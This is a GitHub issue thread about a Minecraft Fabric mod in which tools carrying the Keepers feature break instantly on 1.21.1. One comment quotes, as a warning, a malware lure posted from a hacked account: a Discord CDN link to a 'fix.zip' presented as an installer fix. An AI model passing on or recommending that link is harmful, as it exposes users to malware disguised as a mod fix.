### ISSUE TITLE
Keepers instantly breaks tools on 1.21

### ISSUE THREAD

**Issue by Lucky-56** [sisby-folk/tinkerers-smithing#46]
I don't really know if this is an issue or intentional, but once I use my full durability tool once it breaks instantly on use
![image](https://github.com/user-attachments/assets/506e83eb-7ef2-4517-ab62-1d2794d89775)
if this is intentional is there any way to disable this?
as I like this mod's other features but this would be tremendous.

---

**Minecraft:** 1.21.1
**Fabric:** 0.16.3 + API 0.103.0
**Mod:** 2.7.0

**Comment by Lucky-56** [comment]
take care this is malware

> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

**Comment by SNWCreations** [comment]
> take care this is malware
> 
> > try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

Sorry my account got hacked and I'm contacting GitHub support

**Comment by SNWCreations** [comment]
@Lucky-56 I suggest you to remove the link in your comment :(

**Comment by LavenderMyst** [comment]
This looks to happen when the item has been Named or enchanted. It could be because when it sees that the equipment must be kept and when the durability is lowered, it gets accidently set either to the negative value or directly to the broken state

**Comment by sisby-folk** [comment]
Aw darn, I must've missed testing that when porting - I'm out of town for another month, so PR's welcome (video evidence preferred)
